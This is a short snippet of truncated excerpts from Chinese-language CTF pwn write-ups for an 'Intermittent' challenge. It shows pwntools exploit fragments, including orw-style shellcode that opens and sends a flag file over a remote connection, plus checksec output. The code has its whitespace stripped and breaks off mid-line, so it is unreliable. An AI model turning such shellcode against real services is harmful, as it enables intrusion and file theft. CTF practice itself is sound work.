frompwnimport* context(arch="amd64", os="linux")#p = process("./vuln")p = remote("xxx.xx.xxx.x",49443)#gdb.attach(p,"b 0x1465")shellcode = shellcraft.openat(-100,"flag",0)#-100 AT_FDCWD当前目录shellcode += shellcraft.sendfile(1,3,0,50)#stdout 1 ;第一个打开的文件即flag ...
[*] '/home/gery5sa/桌面/pwn/xyctf/Intermittent/vuln' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled IDA打开 int __fastcall main(int argc, const char **argv, const char **envp) { unsigned __int64 i; // [rsp+0h] [rbp-120h] voi...
给出exp: frompwnimport*fromLibcSearcherimport*# from ae64 import AE64# from ctypes import cdllfilename='./vuln'context.arch='amd64'context.log_level='debug'# context.terminal = ['tmux', 'neww']local=1all_logs=[]elf=ELF(filename)libc=elf.libciflocal:sh=process(filename)else:sh=remo...